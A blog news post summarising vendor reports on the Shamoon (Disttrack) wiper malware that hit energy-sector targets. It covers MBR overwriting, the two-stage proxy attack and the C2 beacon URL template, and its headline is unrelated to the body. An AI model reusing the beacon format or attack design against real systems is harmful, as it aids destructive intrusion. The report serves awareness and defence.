New Virus Turns Your Computer Into a Republican
Read Time:4 Minute, 28 Second
Reports of the ‘Shamoon’ malware began emerging from security companies on Thursday. Like other malware, it steals information, taking data from the ‘Users’, ‘Documents and Settings’, and ‘System32/Drivers’ and ‘System32/Config’ folders on Windows computers. One unusual characteristic, however, is that it can overwrite the master boot record (MBR) on infected machines, effectively rendering them useless.
According to ZDNet,
Shamoon, which is also known as Disttrack, is being used in targeted attacks against at least one organization in the energy sector, according to Symantec.
“Threats with such destructive payloads are unusual and are not typical of targeted attacks,” Symantec wrote on its security response blog on Friday. “Security response is continuing to analyse this threat and will post more information as it becomes available.”
The malware consists of a 900KB folder that contains a number of “encrypted resources”, according to Kaspersky Labs. One of these has a signed disk driver from EldoS, a corporate security component provider, which is used for raw disk access by the malware’s components.
It affects Windows 95, Windows 98, Windows XP, Windows 200, Windows Vista, Windows NT, Windows ME, Windows 7, Windows Server 2003 and Windows Server 2008. Symantec said it has updated its antivirus to protect against the malware.
In an analysis, malware detection company Seculert concluded that Shamoon uses a two-stage attack. First it infects a computer connected to the internet and turns this into a proxy to communicate back with the malware’s command-and-control server. After that, it branches out to other computers on the corporate network, steals information, then executes its payload and wipes the machines. Finally, it communicates this to the external command-and-control server.
“It is still unclear who is behind this attack,” Seculert wrote in a blog post. “We will update this blog with more information when it becomes available.”
According to Gizmodo, This new virus contains a file named Wiper, which the Flame virus also has. But the Wiper file in Shamoon doesn’t share the same code as the one in Flame, which is why experts suspect a copycat is at work. Specifically, Kaspersky believes it’s the doing of script kiddies. Shamoon, like Flame, reportedly collects data on any machine it infects, then proceeds to erase the disk. But taking things one step further, the virus then overwrites the disk with a fragment of a JPEG file, making it nearly impossible to recover the lost data.
Security firm Securalert believes that its recent implementation was a two-stage attack executed from inside.
The attacker took control of an internal machine connected directly to the internet, and used that machine as a proxy to the external Command-and-Control (C2) server. Through the proxy, the attacker infected the other internal machines, which were probably not connected directly to the internet.
Once the intended action on the internal infected machines was complete, the attacker executed the Shamoon malware, wiping all evidence of other malicious software or stolen data from those machines. It then reported back to the external C2 through the proxy.
No one has come out and said specifically what power plant Shamoon worked its destructive powers on, but Ars Technica points out that the Saudi Aramco plant was a victim to attack last week in Saudi Arabia. What experts do know is that Shamoon is definitely part of a targeted attack. What they don’t know is who. Or why.
What’s strange about Shamoon, however, is that it doesn’t appear to be collecting any sensitive info like Flame, which sniffed out passwords, documents and anything else vital to the operation of the Iranian facilities. Instead, Symantec says Shamoon is only concerned with reporting the names of the files it deleted, how many files it deleted, and the IP address of the computers infected. Destruction seems to be the primary objective.
The Reporter component is responsible for sending infection information back to the attacker. Information is sent as a HTTP GET request and is structured as follows:
http://[DOMAIN]/ajax_modal/modal/data.asp?mydata=[MYDATA]&uid=[UID]&state=[STATE]The following data is sent to the attacker:
[DOMAIN]-a domain name
[MYDATA]-a number that specifies how many files were overwritten
[UID]-the IP address of the compromised computer
[STATE]-a random numberThreats with such destructive payloads are unusual and are not typical of targeted attacks.
Maybe the attacker already knows what is on the machines (which would make sense if the attack originated from within), but it still doesn’t explain the motivation for such a risky stunt on the part of a script kiddie.
If this is a non-political attack from an unaffiliated mischief maker, is this only the beginning for this kind of thing? A rash of unprovoked attacks on energy facilities could be downright devastating if properly executed. The immediate fallout might seem minor, and even inconsequential. But as we saw with Anonymous and LulzSec’s hacking spree last fall, an event like this can snowball into something quite harrowing.
Many thanks to Kaspersky, Symantec, Seculert via Ars Technical for their contributions to this story.
Follow MadMike’sAmerica on Facebook and Twitter, and don’t forget to visit our HOME PAGE.
If you liked our story please share it at REDDIT.COM and PINTEREST as well as TUMBLR.
Happy
0 %
Sad
0 %
Excited
0 %
Sleepy
0 %
Angry
0 %
Surprise
0 %
0
0
Subscribe
Login
0 Comments
